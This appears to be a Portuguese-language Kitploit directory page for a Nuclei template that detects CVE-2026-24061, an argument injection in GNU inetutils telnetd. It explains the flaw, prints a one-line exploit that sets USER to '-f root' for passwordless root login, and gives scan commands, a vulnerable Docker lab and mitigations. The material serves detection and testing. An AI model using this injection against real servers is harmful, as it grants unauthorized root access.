Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — Modelo Nuclei para detetar CVE-2026-24061, uma injeção crítica de argumentos telnet no telnetd do GNU inetutils que permite acesso root não autenticado. | Kitploit
Ferramentas/GitHubGitHub/mr-zapi/cve-2026-24061
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança de RedeTestes de PenetraçãoAprendizado e Educação
GitHubmr-zapi/cve-2026-24061

CVE-2026-24061

Modelo Nuclei para detetar CVE-2026-24061, uma injeção crítica de argumentos telnet no telnetd do GNU inetutils que permite acesso root não autenticado.

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24061 - Injeção de Argumentos no Telnet

Template Nuclei para detecção da vulnerabilidade CVE-2026-24061 no GNU inetutils telnetd, que permite obter acesso root sem autenticação.

📋 Descrição da Vulnerabilidade

CVE-2026-24061 é uma vulnerabilidade crítica de injeção de argumentos no GNU inetutils telnetd, que permite a um atacante obter um shell root sem conhecer a senha.

Como funciona?

  1. Raiz do problema: Em 2015, um novo template de login com o parâmetro dinâmico %U foi adicionado ao telnetd:
root@kitploit:~
   /usr/bin/login -p -h %h %?u{-f %u}{%U}
  1. Vulnerabilidade: A variável de ambiente USER é transmitida através do protocolo telnet (RFC 1572 NEW-ENVIRON) e não é sanitizada antes da substituição no comando.

  2. Exploração: O atacante define USER="-f root" ao conectar:

root@kitploit:~
USER="-f root" telnet -a target.com 23
  1. Resultado: O comando de login se torna:
root@kitploit:~
   /usr/bin/login -p -h hostname -f root

A flag -f significa "skip authentication" → root sem senha 💀

🎯 Versões Afetadas

  • GNU inetutils telnetd com template de login vulnerável
  • Por exemplo: inetutils-telnetd 2:2.0-1+deb11u2
  • Sistemas onde o telnetd usa autologin sem Kerberos

🚀 Uso

Varredura básica

root@kitploit:~
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Múltiplos alvos

root@kitploit:~
nuclei -t cve-2026-24061.yaml -l targets.txt -code

🔬 Laboratório de Testes

Para testar, você pode subir um container Docker vulnerável:

root@kitploit:~
FROM debian:11-slim

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
      inetutils-telnetd=2:2.0-1+deb11u2 \
      telnet && \
    rm -rf /var/lib/apt/lists/*

RUN useradd user1 && \
    sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf

EXPOSE 23

CMD ["/usr/sbin/inetutils-inetd", "-d"]

Execução:

root@kitploit:~
# Construir a imagem
docker build -t vuln-telnetd .

# Executar
docker run -d -p 2323:23 vuln-telnetd

# Verificar a vulnerabilidade
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v

🛡️ Proteção

  1. Atualizar o inetutils para a versão corrigida
  2. Desativar o telnetd e usar SSH
  3. Filtrar a porta 23 no firewall
  4. Monitorar conexões telnet

📚 Referências

  • NVD - CVE-2026-24061
  • SafeBreach Labs - Root Cause Analysis

📊 Pontuação CVSS

9.8 / 10 - Crítica

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • AV:N - Rede (ataque pela rede)
  • AC:L - Baixa complexidade (fácil de explorar)
  • PR:N - Nenhum privilégio necessário (sem autenticação)
  • UI:N - Nenhuma interação do usuário (exploração automática)
  • C:H/I:H/A:H - Alto impacto na confidencialidade, integridade e disponibilidade

⚠️ Aviso Legal

Esta ferramenta destina-se apenas a testes de segurança legítimos em sistemas para os quais você tem permissão explícita.

O autor não se responsabiliza pelo uso indevido deste template.

👤 Autor

Criado por Mr.Zapi

Baixar ferramenta